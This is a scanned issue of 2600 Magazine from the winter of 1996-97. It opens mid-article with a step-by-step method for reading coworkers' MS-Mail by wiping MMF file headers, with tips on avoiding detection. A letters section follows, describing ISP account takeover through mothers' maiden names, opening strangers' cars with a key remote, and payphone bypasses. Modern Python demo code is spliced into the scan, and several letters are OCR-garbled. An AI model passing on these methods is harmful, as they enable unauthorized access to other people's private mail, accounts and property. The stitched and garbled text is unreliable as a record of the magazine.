MS-Exchange) for its email system, the 
following describes a way to snoop through 
other people’s mail. 

MS-Mail allows users to either store 
their mail and attachments on the mail 
server (the default option) or locally on the 
user’s hard drive (or another network drive). 
If mail is saved locally, it is usually stored 
in a file called MSMAIL.MMF or MAIL. 
MMF in the \WINDOWS directory. If it is 
stored on the mail server, each user will 
have a unique filename with an extension of 
MMF (example: 000003C2.MMF). These 
files are stored in a directory called \MMF\ 
which makes them easy to locate. It is not 
known at this time how to cross reference a 
filename of 000003C2.MMF back to user 
“Jane Doe”. More research will need to be 
done. 

The first 512 bytes of the MMF file is a 
header, which stores information about the 
file’s size, the number of messages and at- 
tachments, password, etc. The rest of the 
file is (presumably) the message data and 
attachments. It is compressed/encrypted to 
keep prying eyes (like ours) away. The 
method of encryption doesn’t matter; we’ll 
let MS-Mail do all the work for us. 

If the header of the file gets destroyed, 
the MMF file will need to be reconstructed. 
Luckily, MS-Mail has a fantastic MMF file 
rebuilder included! Using Mr. Norton’s 
diskedit utility, or some other hex editor, 
simply open up the .MMF file and wipe the 
first 512 bytes out with 0’s. This effectively 
removes the password from the file, and al- 
lows the messages to be viewed. 
It is extremely important that you log 
out of your mail server!!! If you are reading 
someone else’s mail while still logged in 
under your own account, you may end up 
opening a message with a return receipt at- 
tached, which will broadcast the fact that 
you have read this piece of mail! 

Quit MS-Mail, log out of the network, 
and rename your local mail file to some- 
thing other than MSMAIL.MMF. (This is to 
keep your personal mail file safe.) If you 
have your mail file stored on the network, 
the act of logging out of the network will 
keep your file safe. Open MS-Mail again. It 
will complain that it cannot attach to your 
mail server, but it will ask if you want to 
work offline. After selecting yes to working 
offline, MS-Mail will display the login box 
for you to enter your username and pass- 
word. Change your login name to some- 
thing other than what you login in as. You do 
not need to enter a password. (The password 
is verified against the mail server; since you 
are working offline, it can’t check it.) 

Now MS-Mail will tell you it cannot 
find your mail file (because you renamed it) 
and it will bring up an “open new file” win- 
dow. Point MS-Mail to the new .MMF file 
with the trashed header. It will come up 
with a box that says that the file has an in- 
consistency and will need to be repaired. 
Depending on the size of the file, it can take 
a long time to reconstruct it, so be prepared 
to wait. While the file is being recon- 
structed, you cannot switch to any other 
windows, so your machine is completely 
crippled during the reconstruction phase. 

Once the file has been reconstructed, 
most of the messages will appear in the 
“lost and found” mail folder. Attachments 
will usually be lost. A portion of the mes- 
sages will also be lost. Results will vary 
with each file that you try to open. In fact, it 
may not let you into the file at all, telling 
you the username or password was invalid. 
You should, however, be able to get into 
most of the files you try, and be able to read 
a good portion of the messages inside. 

Another thing to try is to copy the 512 
byte header from your personal MMF file 
over the top of the target MMF file. You will 
need to enter your login name and password 
for this file, but after reconstruction, you 
will probably have a better chance of get- 
ting access. 

Here is some information that I have 
gathered about the headers in MMF files: 


Most of the header is zeroes. I assume 
some of the data is repeated for double re- 
dundancy. 

The fact that the file can be reconstructed 
without the password makes me think that 
the password is used only for verification of 
the user, not as a key for decrypting the file. 
This means that the password verification 
could probably be removed from the code in 
MS-Mail altogether, allowing any file to be 
opened and all the messages/attachments 
preserved! 
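To make the point of the last paragraph concrete, here is an added example (not the article's or Microsoft's code) of two constructed toy file layouts: one where the password only gates access, so a wiped header is simply "rebuilt" and read, and one where the password is the key. PROGRAM_KEY, the SHA-256 counter-mode stream, and the header offsets are invented for the illustration and are not MS-Mail's real MMF format.

```python
"""A password that only gates access is not a key.

Two CONSTRUCTED toy mail-file layouts (not MS-Mail's real MMF format):
both put a 512-byte header before the message data. In the "gate" layout
the password is merely checked against a verifier in the header while the
body is scrambled with a key built into the program, so a wiped header
drops into a "rebuild" path and the mail is readable. In the "keyed"
layout the key is derived from the password and a salt kept in the
header, so wiping the header destroys the only route to the plaintext.
"""
import hashlib
import hmac
import os
from typing import Optional

HEADER_LEN = 512
PROGRAM_KEY = b"constructed key baked into the toy program"  # the weak design's secret
PBKDF2_ROUNDS = 100_000


def keystream_xor(key: bytes, data: bytes) -> bytes:
    """SHA-256 in counter mode as a toy stream cipher (illustration only)."""
    out = bytearray()
    for off in range(0, len(data), 32):
        block = hashlib.sha256(key + off.to_bytes(4, "big")).digest()
        out += bytes(a ^ b for a, b in zip(data[off:off + 32], block))
    return bytes(out)


def gate_create(password: str, body: bytes) -> bytes:
    """Weak layout: header = magic + sha256(password); body under PROGRAM_KEY."""
    verifier = hashlib.sha256(password.encode()).digest()
    header = (b"GATE" + verifier).ljust(HEADER_LEN, b"\x00")
    return header + keystream_xor(PROGRAM_KEY, body)


def gate_open(data: bytes, password: Optional[str]) -> bytes:
    header, body = data[:HEADER_LEN], data[HEADER_LEN:]
    if header == bytes(HEADER_LEN):
        # "damaged" header: the rebuild path never consults a password
        return keystream_xor(PROGRAM_KEY, body)
    verifier = hashlib.sha256((password or "").encode()).digest()
    if not hmac.compare_digest(header[4:36], verifier):
        raise PermissionError("bad password")
    return keystream_xor(PROGRAM_KEY, body)


def keyed_create(password: str, body: bytes) -> bytes:
    """Stronger layout: key = PBKDF2(password, salt); header = magic + salt + MAC."""
    salt = os.urandom(16)
    key = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, PBKDF2_ROUNDS)
    ct = keystream_xor(key, body)
    tag = hmac.new(key, ct, hashlib.sha256).digest()
    header = (b"KEYD" + salt + tag).ljust(HEADER_LEN, b"\x00")
    return header + ct


def keyed_open(data: bytes, password: str) -> bytes:
    header, ct = data[:HEADER_LEN], data[HEADER_LEN:]
    salt, tag = header[4:20], header[20:52]
    key = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, PBKDF2_ROUNDS)
    if not hmac.compare_digest(hmac.new(key, ct, hashlib.sha256).digest(), tag):
        raise PermissionError("wrong password or damaged header")
    return keystream_xor(key, ct)


def wipe_header(data: bytes) -> bytes:
    """Zero the first 512 bytes, the manipulation the article describes."""
    return bytes(HEADER_LEN) + data[HEADER_LEN:]


def demo() -> dict:
    """Open a header-wiped file under each layout and report what survives."""
    body = b"From: jane\nSubject: constructed sample message\n\nhello\n"
    gate_readable = gate_open(wipe_header(gate_create("hunter2", body)), None) == body
    try:
        keyed_open(wipe_header(keyed_create("hunter2", body)), "hunter2")
        keyed_readable = True
    except PermissionError:
        keyed_readable = False
    return {"gate_readable_after_wipe": gate_readable,
            "keyed_readable_after_wipe": keyed_readable}


if __name__ == "__main__":
    print(demo())
```

The flip side is that a damaged keyed header is unrecoverable even for the legitimate owner without a backup; a real design has to make that trade-off explicit rather than bolt a "rebuilder" onto a format whose password never protected anything.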

More research will be done on this sub- 
ject. I will also be doing work on MS- 
Exchange shortly. 


Have fun! 


WRITE FOR 2600! 


Apart from helping to get the hacker perspective 
out to the populace and educating your fellow hackers, 
you stand to benefit in the following ways. 


A year of 2600 for every article we print 
(this can be used toward back issues as well) 
A 2600 t-shirt for every article we print 
A voice-mail account for regular writers 
(two or more articles) 
An account on 2600.com for regular writers 


(2600.com uses encryption for both login sessions 
and files so that your privacy is greatly increased) 


PLEASE NOTE THAT LETTERS TO THE EDITOR 
ARE NOT ARTICLES 


Send your articles to: 


2600 Editorial Dept. 
P.O. Box 99 
Middle Island, NY 11953-0099 
YOUR LETTER COULD BE HERE 


The Ruling Class 


Dear 2600: 

In the second week of October, I was called into the main office of my high school. My mother, who happens to work there (head of nutrition, also known as the head cook), was also called in. When we entered the principal’s office, we were handed a packet of about eight to ten pages with email headers and text on the first four pages, and World Web: 
big trouble. Apparent! 
in the body of her email: Hs $ j 
and “bitch”. We read these ' eh x ding these’ 
did not send them, and: then directed to the last four 
pages of the packet, w! from my WWW horhe 
page. This, unfortunately, % 1 Back mo “smed a famous per- 
son, political figure, d fto flame my 
computer teacher. I sai i 
school policy” were in 4 
ing some fun with their 4# 
Another line had her e 
my UNIX shell accoun 
erslastname@schoolsd 

I was told that by p 
to privacy, and by send 
They told me that the 
friend (who has a comp 
machine that hosts my UW 
be traced to the domai 
that it couldn’t be trace 

I agreed to a three {iá 
questionable emails. I d 
mother losing her job a 
happened, and I got my: 
Unfortunately, I am stilf 




home page, but I am ree 
I wrote this becaus 
went overboard in susp 
modern day injustices 
doing something they 








# page. I had a joking j 
and the sentence had #3 


ae I came up with her E-Mail address. 
could be prosecuted for libel, slander, etc. 
ed to me, which from what I am told by 
unt) isn’t possible since email is ony: 
ät it was sent from. At the time IL dig 
ie lack of ability to prove my: 
ia, but never once did 


Anything on the net can be manipulated and email can be made to look like it came from someplace it didn’t. If you’re to be accused of sending malicious mail, your accusers should have their facts straight. In other words, it’s not up to the accused to prove their innocence as much as it’s up to the accusers to prove their guilt. In the school environment, though, almost anything goes. Intimidation tactics and outright lies are frequently used to get innocent people to admit to crimes. It’s often advantageous to fight back rather than submit to their demands, even if they seem to have the upper hand. Many times, they just want the whole mess to end quickly. 


ail address, I was infringing upon her right 

Dear 2600: 

I am currently a sophomore in high school. More and more, I can share the feelings that Bernie S. must have felt with the S.S. At my school, I found out their password which was not well chosen. I looked around the system for well over a month, and mastered it. Then someone saw something was up, asked around a little, and my name turned up. Now I am treated as if I killed someone. The punishment I got was equivalent to carrying a gun to school. I followed my ethics and never once harmed or altered anything without changing it back. 

Josh 

Abilene TX 


Dear 2600: 


most uptight people I have ever met. 

They have given us every possible advantage such as direct ethernet connections to the LAN and Internet from the dorms and access to SUN machines as well as a large lab, but when I called the help desk because my gateway on the LAN had been brought down, I got a rude awakening. I told them that it died while I was connecting to www.2600.com, and the help desk moron went crazy. He told me I had no business connecting to that site, and told me that they’d fix my gateway tomorrow, 


rednecks, I guess). Can: 




more, I’m 


Its amazing how little things ë 
with petty-minded bureaucrats. And 
world, 


Folklore 


Dear 2600: 
I found from a friend a number that is supposed to detect taps. The number is 


whole lot better out here in the real 


We’re not going to waste much space on this old myth except to say that it’s a slight variation on an old story - the only difference is the distinction between federal and local taps. Cute. If we took this seriously, every time somebody else calls the number we have a local tap on our line. Add to that the fact that nearly every exchange in that area has a sweep tone test on the 0003 suffix, which happens to be a phone company test number. 


Finding People 


Dear 2600: 

In regards to Volume 13, Number 2, page 38, Raul in Houston was asking for a 
database to find info on people. Go to www.yahoo.com/search/people/ where you 
can enter in fields like first and last name, city, and state (or you can only enter one 
l to college when dealing: 


field if you wish) but at any rate it will display the person’s address or phone num- 

ber. They also have one for finding email and homepages - it’s like an Internet white 
pages. 

Asmodeus 

McKinney, TX 


Info Needed 


{aps you could help me. 
interesting, but I have 




re are four carriers ac- 
make a “ping” and ac- 
othing works. I cannot 
only Brazil, England, 
USA, and Chile are accessible ee 


# tones for the past 


Jorge 

Uruguay 

The best advice we can give is that ali gA& will yield to 150mS of 
+2600, 10mS silence, and 150mS of 24 imon knowledge and it is 


a Dutch telecom card. 
Geert 

Holland 

Make the check out to 


r. He mentioned that he 
t out other H/P in this 
questions to local com- 
$ ; from another H/P here. 
Could you please send me any address info that you have on him/her, either physical or email? Social networking keeps us together. 





DoubleZeroOne 
And privacy invasion will tear us apart. We don't reveal any info about any of 
our subscribers for obvious reasons. 


Dear 2600: 

I read somewhere that there are some payphones that have a 2400 modem in 
them. If the phone rings ten times, the modem will answer letting the caller dial out 
or perform other useful operations. Is this possible, or just another pile of shit? By 
the way, is there a method or whatnot for connecting to a Windows 3.x or 95 run 
machine? That could be very useful. Someone should write an article. 

Yosemite Sam 
Indeed someone should. You can bet that there are 
payphones of many varieties that answer in all different 
modes allowing all kinds of functions to be performed 
by those in the know. 


Encryption 


Dear 2600: 

On the inside cover of your mag, there is a pgp en- 
coded message. Please post or send the key. I realize the 
message was probably meant to be decoded by a brute 
force crack, but as cryptology is not my thing, I would 
appreciate it. 

Data Stream 

That’s not a message, it’s our PGP public key which 
allows you to send us messages that only we can read. 
Theoretically anyway. 


Dear 2600: 

I’ve read your magazine for quite some time and 
very much enjoyed the spring issue, so I was especially 
dismayed to read the summer issue. I don’t know what 
led you to print the two articles, “Secret Codes” and 
“How to Create Encryption”. The former was just poor 
taste, but the latter was irresponsible journalism. 

The information in “Secret Codes” is the sort of 
material that I would expect to find in a children’s book 
and is suitable for passing notes in class. It’s not what I'd 
expect to find in the premiere hacker quarterly. However, 
the program that Mister Galaxy wrote could be handy 
for sending messages to your friends on BBS’s if you’re 
afraid that the sysop snoops through people’s e-mail. 

On the other hand, “How to Create Encryption” was 
the biggest load of bullocks that I’ve ever had the mis- 
fortune to read in my life. If TheCrow were trying to pro- 
vide a very basic introduction to cryptography in order to 
get people interested and maybe explore it a bit, his arti- 
cle would have been bad, but not negligent. However in 
his first paragraph, he states that the purpose of the arti- 
cle is to keep people like the Secret Service from reading 
your data. Anyone who thinks that reading this article 
and applying the sketchy information provided will keep 
the Feds from accessing their data is very misled. 

Further, the article was not researched in the slight- 
est. I'd like to see a reference for TheCrow’s assertion 
that “brute force [is] impossible as long as your key is 8 
characters long or so”. Wouldn’t that be nice if it were 
true! Also, he states that “whatever formula you choose 
to use is resulting in completely random encrypted val- 
ues”. If the values were completely random, then you 
wouldn’t have any way of retrieving them again. The 
values should appear totally random. This may seem nit- 
picky, but people shouldn’t feel that they can introduce a 
random number generator into their formula and then 
wonder why they can’t retrieve their plaintext again. 

Some of the points that he makes are valid, like 
checking for patterns in the cyphertext and making sure 
that your plaintext doesn’t have distinguishing features 
which will undermine your encryption algorithm, and 
then he says something completely boneheaded like, 
“the big name encryption products of today use formu- 
las that are very hard to do backwards (factoring large 
prime numbers). This is effective, but it’s slow.... If you 
choose you can figure out your own algorithm...” 

Reader: “Well, damn, I'd really like to keep the 
NSA from digging through my data, but I don’t want to 
wait for something that uses large primes. True, it’s se- 
cure, but it’s also slow. I know... I’ll figure out my own 
algorithm! And I’ll make sure that it’s really hard to take 
the reciprocal of!” 

TheCrow then goes on to cheerfully ignore delving 
into any detail about an algorithm, as if, having hand- 
waved over the large prime issue, the rest is trivial. 
Since large primes are out of the picture (since TheCrow 
isn’t that good at math) there are some other tricks he 
enjoins the reader to try. Unfortunately, they are just that 
- tricks. And now having published them, even provided 
this methodology was secure, they are no longer viable. 
Or does he think that the sort of person who he worries 
about cracking his data doesn’t read 2600. If I ever de- 
cided that I wanted to see what was on TheCrow’s hard 
drive I’d decrypt the last few bytes of his file and tack 
that onto the key and decrypt the rest. Oh, wait. I forgot 
that the key was more than eight characters. I'll never be 
able to crack that. Never mind. 

The crowning glory is TheCrow’s offer to give the 
executable version of his program out for free while re- 
taining the source code. It is an accepted practice in the 
field of cryptography to release your algorithm, because 
if it is secure, even if the enemy knows it, it won’t help. 
The only time when you wouldn’t want to make the al- 
gorithm known is if it is a) insecure or b) has a trap door. 
Besides, why would TheCrow want to keep the code a 
secret when he’s spelled it all out in loving detail for us? 

I am very disappointed that 2600 saw fit to print this 
pile of shit. If I saw this posted on a BBS somewhere, or 
on some yob’s home page then I would be inclined not 
to take it very seriously. However, by attaching the con- 
siderable reputation of 2600 to it, you’ve validated the 
message that strong cryptography is easy and if you tin- 
ker around a bit, you’ll be able to come up with some- 
thing that will withstand any attack in the world. I 
applaud your effort to print information on cryptogra- 
phy since I think that it is crucial that people have the 
knowledge which will, on one hand, allow them to pro- 
tect their data from prying, and on the other hand, allow 
them to keep the government from legislating away our 
crypto-rights. However, publishing a two-page spread 
by somebody who dismisses strong public-key systems 
as “not very convenient” is irresponsible and tells me 
that either there isn’t much editorial control there, or 
you’re desperate for submissions. If it’s the former, I 
don’t expect that you will outlast the demise of your 
reputation. If the latter, let me know, and I’ll write you 
an article on secure voice transmission through the use 
of pig-latin. 
Incidentally, if I were to be given two pages to try to 
educate people on cryptography, I would tell them to 
read Codebreakers, Applied Cryptography, the sci.crypt 
FAQ, subscribe to the cypherpunks and codepunks 
mailing lists to start with and not to write their own en- 
cryption systems unless their names are Phil Zimmer- 
man or Whitfield Diffie. 

Azazel 

It’s not always possible for us to print the most definitive word on a subject. It’s nearly impossible for us to print an article that is 100% correct, no matter how well written. With this in mind, we take the best of what has been made available to us on a topic and hope that it generates interest, letters, and corrections, not to mention future articles. That may very well happen in this case. 


Dear 2600: 

What is used to encrypt your box files? I’m not 
AOL scum - please don’t respond to this letter with a 
witty retort. Thank you. 

Anonymous 

Only an AOL person would fear a witty retort. That 
said, we can assume you're referring to files on our web 
site (www.2600.com), which are not encrypted at all 
since people wouldn’t be able to read them. Many files 
are compressed using a program known as gzip. Most 
any system on the net should allow you to gunzip such 
files, which typically have an extension of .gz. 


Dear 2600: 

Just finished reading TheCrow’s article. He can save 
himself some trouble by using IDEA, in the conven- 
tional encryption mode of PGP. I am also wondering 
why he seems reluctant to release source code. Cypher- 
punk suspicion dictates looking at that before trusting 
any new algorithm. IDEA and 3DES have source avail- 
able publicly and, while I am personally unqualified to 
do the math of checking them, I trust those who have 
done so. I think it’s a good idea to assume an attacker 
has your algorithm and source code. Single DES is very 
bad - banks still use it but it’s only 56 bit and so can be 
bruted by the NSA or anyone with $10 million or so, 
from what I hear. Don’t take all this wrong, I am in favor 
of you writing encryption stuff. The more out there, the 
better for everyone. 

A good, simple test for randomness and repeating 
patterns is to pkzip the encrypted and random-looking 
file. If it shrinks a lot, it is not very random. There are 
others out there as well, but I have never tried them. I 
would strongly suggest not trusting the human eye for 
this task, and just about everyone has pkzip. Good 
sources of randomness are rare. Radioactive decay is 
one, but a lot of stuff that looks random to the human 
eye is not really and truly random. These and other 
points are covered very well in PGPdocs 1 & 2 and Ap- 
plied Cryptography, which are good reading for anyone 
interested in the subject. Commenting on bigmother’s 
hatred of crypto, John Von Neumann once said, “Any- 
one who considers arithmetical methods of producing 
random digits is, of course, in a state of sin.” Keep on 
sinning. 

WinSocker 
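The pkzip test WinSocker describes, as an added example that is not from the letter: it uses zlib's DEFLATE in place of pkzip, a constructed sample text, a repeating-key XOR standing in for a weak cipher, and os.urandom standing in for what good ciphertext should look like.

```python
"""Compression as a quick sanity check for "random-looking" ciphertext."""
import os
import zlib

# Constructed sample text: repetitive on purpose so a compressor has work to do.
SAMPLE_TEXT = (b"Dear 2600: constructed sample message text, repeated to give "
               b"the compressor something to find. ") * 40


def compression_ratio(data: bytes) -> float:
    """Compressed size over original size; about 1.0 or more means incompressible."""
    return len(zlib.compress(data, 9)) / len(data)


def repeating_key_xor(data: bytes, key: bytes) -> bytes:
    """Deliberately weak 'encryption': a short key reused, so plaintext structure survives."""
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))


def looks_random(data: bytes, threshold: float = 0.98) -> bool:
    """The letter's rule of thumb: if it shrinks noticeably, it is not random enough."""
    return compression_ratio(data) >= threshold


def demo() -> dict:
    """Ratios for plaintext, weakly 'encrypted' text, and a random stand-in for good ciphertext."""
    weak = repeating_key_xor(SAMPLE_TEXT, b"KEY!")
    random_stand_in = os.urandom(len(SAMPLE_TEXT))
    return {
        "plaintext": compression_ratio(SAMPLE_TEXT),
        "weak_xor": compression_ratio(weak),
        "random": compression_ratio(random_stand_in),
    }


if __name__ == "__main__":
    for name, ratio in demo().items():
        verdict = "random-looking" if ratio >= 0.98 else "structured"
        print(f"{name:10s} {ratio:.3f}  {verdict}")
```

A ratio near 1.0 only says the output has no structure DEFLATE can find; passing this test is necessary, not sufficient, for a cipher's output to be sound.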


Questions 


Dear 2600: 

I have a question regarding frog’s article “Imagi- 
nary Friends” on scamming ma bell with a fake identity. 
OK, so you provided the phone company with all that 
fake info. Don’t they need your real address to give you 
phone service? 

thedespised 

Yes, but the reason for doing it like this is so that 
your imaginary friend begins to turn into a real person. 
He just happens to be living in your house for now. And 
the flip side is that if the phone service is in his name, it 
isn't in yours. 


Dear 2600: 

I have already bought your t-shirts, subscribed to the 
magazine off and on for the last few years, and bought it 
on the stands when not subscribed. But what I was won- 
dering is if ya all planned to come out with a 2600 base- 
ball cap. I personally think you would sell a good 
number of them. I would like to buy one. A black one 
with the 2600 graphic that you put on all the T-shirts. 

Merlin 
Anchorage, AK 

We’ve toyed with the idea of a rave cap but we just 
haven’t gotten our act together yet on that one. We’re not 
exactly at the PBS level of marketing and with luck we 
never will be. But the cap remains a possibility. 


Holes 


Dear 2600: 

This may not come as a surprise, but a lot of ISP’s 
are very insecure. They may have their passwords shad- 
owed and all their exploits plugged, but they may be 
missing a very important hole. Recently, when I 
switched ISP’s, I realized something very cool. While I 
was telling them my info, they asked me for my 
mother’s maiden name and said that it would be my “se- 
cret word”. I thought to myself, “Hey, I could do some 
hardcore social engineering here!” I decided to test my 
theory out. First I called up the ISP, then I went to cus- 
tomer service, then I told the operator that I forgot my 
password, but I had my secret word. They then told me 
the real password to the account. Of course it’s not as 
good as some other methods, but it works. I know a 
bunch of my friend’s mother’s maiden names so I got 
some of their accounts. I wasn’t an asshole about it - I 
told them that I knew and they were very surprised. To 
all of you in the world of dial-in Internet access, I 
strongly suggest changing your “secret word” if your 
ISP uses one. I have gotten three accounts from mindspring 
on this method, and two from local providers. I 
just wanted to warn and tell everybody! 

charr 

Atlanta 

ISP's aren't the only ones vulnerable in this manner. 
Many credit card companies ask for your mother's 
maiden name as a password. It's a remarkably dumb 
way of authenticating someone's identity when you give 
it even a small amount of thought. 


On Cluelessness 


Dear 2600: 

I just read the last issue (Volume 13, Number 3) and 
was wondering: has the hacker mentality gone this low?! 
Cesar, Rev. Doktor S-Bo, and mthed should get a fucking 
clue and stop jumping to conclusions. I looked at the 
cover and laughed my fool head off (there is a red line 
surrounding the perimeter of the cover, thus making a red 
box). I really hope that the majority of the people reading 
this magazine got that or else we are in real trouble. 

Zyklon B 


Observations 


Dear 2600: 

Having telephone service ten yards from the CO, I 
discovered that the metal around the push-button on the 
tap alert heats up to an unbearable temperature, but it 
hasn’t failed. It just gets damn hot due to such a low re- 
sistance in the line, yielding a much higher current. Just 
an interesting piece of information I discovered. 

Dr. Delam 


Dear 2600: 

In response to “The Truth Revealed” from narrow 
minded fear bitters such as The Propagandist and I.M. 
Free: I’m an old phone phreaker who no longer has the 
time required to stay abreast of the “hacker skills”, but 
reading 2600 gives me comfort that Big Brother still has 
checks and balances. Some of us say “never again” to 
the likes of Hitler and if the government is taken over by 
evil, hackers will be indispensable friends fighting for 
our freedom. 

xphreak 


Dear 2600: 

1) An interesting sidelight to the markings on the 
road that Mr iNSaNiTY complained about and that were 
explained in the Autumn issue is that in certain areas of 
San Francisco these markings are actually in Chinese! I 
guess there must be a requirement - at least in San Fran- 
cisco - that the markings must be understandable to the 
local residents. 

2) Steve Rives’ article about mouse-oriented pass- 
words led me to think of a couple of other ways it could 
work. For example, one could be presented with a list of 
letters A-Z and numbers 0-9, and simply click on the 
letters/numbers that make up the password. While this 
would get around key stealers it still would leave one 
vulnerable to shoulder surfers. Or a password could be 
made up solely of left and right mouse clicks. Either 
way, it’s a novel idea with the age old password. 

3) I have to disagree with DayEight that a good 
motive for hacking your school’s computers is to change 
grades and schedules. Call me old fashioned, but I think 
one should have to work for one’s grades. I know high 
school sucks right now (it sucked for me) but sooner or 
later you’ll be glad you have that diploma. 

4) Reading Derneval’s article about the Brazilian 
phone system actually made me proud to be an Ameri- 
can! (And that’s no easy task, either!) Even with the 
1950’s phone wire pairs in the box downstairs that I still 
haven’t figured out yet, I’m better off than many people 
elsewhere in the world. 

5) I estimate that you probably spend about $2-$3 
on postage for each magazine you send out to sub- 
scribers. Figuring that in, the subscription price of $21 a 
year is fair. 

6) How can I help Ed Cummings? He’s sure been 
through hell and back. 

7) I loved the payphone graveyard on the cover. 

Desaparecido 
Sacramento 


Right now the best way to help Ed is to not forget 
the hell he's been through and to do everything we can 
to keep it from happening to anyone else. Full details 
are on our web site (www.2600.com) and you can write 
to Ed at bernies@2600.com. 


Dear 2600: 

I just wanted to inform you that you’ve got the wrong 
guy. I am talking about Phiber Optik. He doesn’t de- 
serve that name. I am the true Phiber Optik. I thought of 
the name and asked someone on IRC if they liked it. He 
must have seen. You are a big fake! All that stuff in your 
“MOD” book was bull. You can’t do any of that crap you 
did in the book. I can, so watch it you fake. I want my 
name back, and you’re gonna give it to me. Or else, and 
you can try to do anything to me cause I know you’re a 
fake, and I’m gonna tell the world. I am elite. Your 
knowledge of computers is a speck of dirt compared to 
mine. Don’t get me wrong 2600 is ok but you guys are 
kind of dumb. Your mag is full of crap. Anyone who has 
anything to do with 2600 is a geek. Even if you’re dumb 
enough to read it. 

Here’s my info. I am sure you are bull so try to con- 
vince me losers. 

NG 
New Jersey 

You're either a real cocky ninth grader or the guy 
whose name, address, phone number, and school you 
posted is a ninth grader you've had a falling out with. 
Either way we will investigate your claim and an ad- 
juster will be in touch soon. 


Page 34 2600 Magazine Winter 1996-97 





Dear 2600: 

If you haven’t heard recently, there is a completely 
free service called Webring that offers rings to people to 
hook pages together of their tastes (everything from 
hacking to Star Wars to Egyptology). There is also a 
company called RING!Online, a Michigan-based ISP 
that decided that the Webring was a violation of their 
copyright status and is deciding to sue the Webring. The 
RING!Online has no ground for a copyright suit, in my 
opinion, but because they’ve got the money and We- 
bring is free, they are continuing with their lawsuit. I 
was wondering if someone over there at 2600 could help 
the Webring out. The URL for the Save the Webring is: 

http://ikx.org/~ZeroOne/savethewebring/ring.html 

Ammon 


Dear 2600: 

It was with great interest in Dr. Kolos’ article that 
prompted me to buy my first ish of 2600. I was recently 
touring Bosnia with CCIFOR (Canadian contingent) in 
May of 96. I shot over a thousand images and conducted 
several interviews both in Bosnia and Serbia. Oh yeah, 
and I drank vast quantities of Sliwowitz, a rather hard- 
core brandy. I am new to netting, as of Friday the 13th, a 
rather auspicious day to start researching my favorite 
topics such as censorship, accessibility, and communi- 
cations. The former all the more important when dis- 
cussing the former Yugoslavia. IFOR is a shitcan when 
it comes to PR gladhanding. I know. Attend one press 
conference and it’s quite apparent. Sometimes your mag 
loses me but with diligence and lots of homemade wine 
I hope to fully embrace this brave new world and learn 
from the gurus who do exist for the facilitation of info. 
Keep it up dudes! Canadians love this stuff! 

Rosey 

As hackers, it's easy to forget how inspirational the 
things we're involved in can be to people around the 
world. Thanks for reminding us. 


Dear 2600: 

For more on micropower (“don’t call it pirate”) ra- 
dio, check the Radio Resistor’s Bulletin at http://www. 
hear.com/rw/feature/rrb.html. Also, if you’re near a 
Fry’s Electronics (kind of an overgrown Radio Shaft 
with a junk food aisle), they sell little 5-watt stereo FM 
transmitter kits real cheap. 

president@whorehouse.gov 


Dear 2600: 

What a big deal about underground stuff in the Au- 
tumn issue! Here is what we use in California and 
Nevada: red (electric), orange (communication, CATV), 
green (sewer), pink (temporary survey markings), yel- 
low (gas, oil, steam), blue (water), purple (reclaimed 
water), and white (proposed excavation). The number to 
call “before you dig” is 1-800-227-2600! 

CF 
Alameda, CA 

New Stuff 


Dear 2600: 

I have recently come across an interesting adver- 
tisement. Via cell phone, a cop can track (GPS), shut 
down, and lock the doors to a car. Hmmm.... sounds like 
a phun hack. It is similar to the new Lincoln’s, where 
some Ford techy can, through a phone, track down (via 
GPS) a customer’s car, diagnose, and contact a towing 
firm. Now, I’m all for personal security, but me thinks 
this is getting a bit carried away, but leaves room for 
some nice hacks. 

xorsystm 

There are tests underway that will allow cops to 
turn off the engine of a car involved in a chase. The 
whole concept of a speed trap is about to change forever. 


Dear 2600: 

You may have noticed that in newer models of cars, 
many come with remote control unlock/lock transmit- 
ters. They do a variety of things - the Mercury minivans 
can even be started remotely. Now, since there are only a 
certain number of frequencies, some will overlap or 
share. I have noticed that with my remote I can walk 
down the rows of cars at malls or other parking lots and 
open a car every so often by continuously clicking on 
the button. So far, I have had the best luck with Dodge 
cars and trucks. 

TheFetish To Heresy 


Numbers 


Dear 2600: 

I was going to dial my mom at work, so I dialed (or 
thought I dialed) 349 and suddenly I got this speak and 
say voice saying “press 1 for coin test, press 2 for coin 
relay test, press 8 for ring test, press 9 for second party 
ring test”. I played with this for awhile, mostly just get- 
ting weird noises or silence. The choices went all the 
way up to 18, with choice 19 being further assistance 
and I didn’t want to run into a smiling and ever-so-gra- 
cious Ma Bell employee. I tried many times to repeat 
this fun little game but to no avail. What was it and what 
can I do with it? My area code is 708 if that makes any 
difference. 

sisifis 

You can't do anything until you find the number 
again. After you do that you'll be able to have all kinds 
of fun making your phone ring, testing red boxes, and 
hearing funny tones. We expect a full report. 


Dear 2600: 

In the 540 area code you can get ANAC by simply 
dialing 811. This works from any phone (fortress or 
not). I’m not sure if this works in any other area codes or 
not. Secondly, close inspection of some of the fortress 
fones in my area revealed a surprise. Up underneath the 
bottom of the outer box (the blue case) I found a modu- 
lar phone plug! I assumed it was a test plug for the telco 
techs since you could plug a normal handset into it and 
make calls like you were on a standard line - totally by- 
passing the fortress fone’s asking for money. One last 
thing. I was at a local company and overheard them say 
they were being plagued by prank calls. They tried the 
ever-popular *69 to call their pranksters back and kept 
getting a message saying their call couldn’t be com- 
pleted using that method. I told them that *67 blocks 
caller ID and possibly even *69. They told me their boss 
told them to do a *57 the next time. They were told that 
this was a way for the phone company to provide you 
with the number of the last person to call you. This 
method is supposed to take several months before you 
get an answer, but it is supposed to be able to trace back 
any number - even those who used *67 first. Is this true? 
If it is, isn’t that a blatant invasion of privacy (as if caller 
ID wasn’t)? 

Captain Video 

The ANAC number differs from region to region. 
The payphones you mention are obviously COCOTs 
that are manufactured by morons since a telco-operated 
payphone would ask for money no matter where on the 
line you clipped in. Perhaps these imbeciles thought 
that nobody would ever plug a phone into that phone 
plug. As for the *57 scam, yes, you can “trace” a num- 
ber in this fashion and the phone company can make a 
little money from your annoyance. Usually you have to 
use it many times before they will do anything at all. You 
can also contact the Annoyance Call Bureau of your lo- 
cal company who are required to track down persistent 
annoyance calls for free. These are really the only calls 
you should be concerned with anyway. 


Dear 2600: 

I’ve seen the topic “What is the ringback number 
for my area?” But I’ve never seen any number for Ger- 
many, so I thought I would help you by sending the ring- 
back number of my area. The number is 117755, after 
which you dial your own number. For example, if your 
number is 123456, then you must dial: 117755-123456. 
This ringback number is only valid for Nuremberg (in 
Bavaria). Have phun! 

Michael 


Corporate Hacking 


Dear 2600: 

